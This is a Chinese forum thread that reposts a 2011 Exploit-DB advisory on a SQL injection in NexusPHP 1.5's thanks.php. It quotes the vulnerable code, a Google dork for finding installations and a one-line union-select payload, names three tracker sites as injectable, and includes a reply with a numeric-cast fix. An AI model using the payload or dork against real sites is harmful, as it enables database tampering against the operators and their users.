chinahdtv cnscg 3dpt 都可以注入修改数据库的漏洞 !

porreal · 发表于 2011-11-22 21:22:22

来吧兄弟，一起玩一起讨论！

您需要登录才可以下载或查看，没有账号？注册

×

chinahdtv cnscg 3dpt  都可以注入修改数据库的漏洞 !  今天发现NexusPHP  SQL注入漏洞 !

http://www.exploit-db.com/exploits/17946/

# Exploit Title: Nexusphp.v1.5 SQL injection Vulnerability

# Google Dork: intitle:nexusphp

# Date: 2011-10-08

# Author: flyh4t

# Software Link: http://sourceforge.net/projects/nexusphp/

# Version: nexusphp.v1.5

# Tested on: linux+apache

# CVE : CVE-2011-4026

Nexusphp is BitTorrent private tracker scripts written in PHP

The codes is here http://sourceforge.net/projects/nexusphp/

There is a sql injectiong Vulnerability in thanks.php.

-----------------------vul code-------------------

//thanks.php

if ($_GET['id'])

stderr("Party is over!", "This trick doesn't work anymore. You need to click the button!");

$userid = $CURUSER["id"];

$torrentid = $_POST["id"];

$tsql = sql_query("SELECT owner FROM torrents where id=$torrentid");

$arr = mysql_fetch_array($tsql);

-----------------------vul code end-------------------

$_POST["id"] is not checked, lead a sql injection Vulnerability

-----------------------exploit-------------------

_POST[id] : -1 union select version()>4/*

-----------------------exploit end -------------------

披甲熊 · 发表于 2011-11-22 21:29:37

哎呦喂看不懂啊你自己发现的啊？去联系网站管理啊说不定给你大红包啊哈哈！这个沙发是我的！

Neverthele · 发表于 2011-11-22 21:35:47

披甲熊发表于 2011-11-22 21:29
哎呦喂看不懂啊你自己发现的啊？去联系网站管理啊说不定给你大红包啊哈哈！这个沙发是我的！

你真够水的，这三个站，有两个没有，一个用的是傻瓜密码，不怕

披甲熊 · 发表于 2011-11-22 21:38:51

Neverthele 发表于 2011-11-22 21:35
你真够水的，这三个站，有两个没有，一个用的是傻瓜密码，不怕

必须得水再说咱水也不是几个字的回复都是高质量高要求的今天还没拿硬币呢你那？

Neverthele · 发表于 2011-11-22 21:41:05

披甲熊发表于 2011-11-22 21:38
必须得水再说咱水也不是几个字的回复都是高质量高要求的今天还没拿硬币呢你那？

{:5_397:}我基本上是不会捡的，感觉这东西和每天发帖数有关

雪豹soft · 发表于 2011-11-22 21:42:07

真是高手呀{:1_87:}

叶落无声@2 · 发表于 2011-11-22 21:46:53

完全表示看不懂{:2_141:}

wosiduyua · 发表于 2011-11-22 21:56:51

软件检测的结果吧？

残情弑爱 · 发表于 2011-11-22 21:59:11

好高深的东西，外行只能来看看热闹了

luoxm@2 · 发表于 2011-11-22 22:24:26

我是外行，只能看热闹了

兆侗 · 发表于 2011-11-23 00:07:15

都看不懂，可是见到水王都来了{:1_87:}

Pia · 发表于 2011-11-23 00:28:57

希望尽快修补吧

Skyrunner · 发表于 2011-11-23 01:00:00

PHP還沒學到,現在被C++ data structure 玩弄中

123ABD · 发表于 2011-11-23 12:46:31

LZ技术帝，小白只能围观了

power12317@2 · 发表于 2011-11-23 14:04:05

早就知道了，于是修复了。
修复方法：

将

$torrentid = $_POST["id"];

复制代码

改为

$torrentid =0 + $_POST["id"];

复制代码

zhouyu7725 · 发表于 2011-11-23 15:44:39

技术性的

浪滔天 · 发表于 2011-11-23 22:22:36

太高深只能膜拜{:3_153:}

albertshi@2 · 发表于 2011-11-24 10:57:10

看不懂啊看不懂。。。

albertshi@2 · 发表于 2011-11-24 10:58:14

power12317 发表于 2011-11-23 14:04
早就知道了，于是修复了。
修复方法：

你应该补充在你的建站贴呢，呵呵

power12317@2 · 发表于 2011-11-24 11:04:29

albertshi 发表于 2011-11-24 10:58
你应该补充在你的建站贴呢，呵呵

呵呵漏洞什么的当然是有个特定的站 Nexusphp技术维护联盟： http://nexusphp.org

[求助/讨论] chinahdtv cnscg 3dpt 都可以注入修改数据库的漏洞 !

来吧兄弟，一起玩一起讨论！

电梯直达
评论22

回复

nas高手

关于我们

服务支持

support@gebi1.cn

[求助/讨论] chinahdtv cnscg 3dpt 都可以注入修改数据库的漏洞 !

来吧兄弟，一起玩一起讨论！

电梯直达 评论22

回复

nas高手

关于我们

服务支持

support@gebi1.cn

电梯直达
评论22